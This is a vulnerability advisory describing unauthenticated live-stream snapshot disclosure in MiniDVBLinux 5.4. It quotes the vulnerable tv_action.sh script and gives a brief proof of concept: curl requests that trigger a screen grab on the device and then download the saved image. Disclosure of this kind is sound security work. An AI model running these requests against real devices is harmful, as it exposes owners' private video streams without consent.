MiniDVBLinux 5.4 Unauthenticated Stream Disclosure

MiniDVBLinux 5.4 Unauthenticated Stream Disclosure VulnerabilityVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application suffers from an unauthenticated live streamdisclosure when /tpl/tv_action.sh is called and generates a snapshotin /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).--------------------------------------------------------------------/var/www/tpl/tv_action.sh:--------------------------01: #!/bin/sh02:03: header04:05: quality=6006: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null--------------------------------------------------------------------Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5716Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php24.09.2022--1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8250 Grabbed image /tmp/tv.jpg 60221 mld closing connection2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg3. Or use a browser: - http://ip:8008/home?site=remotecontrol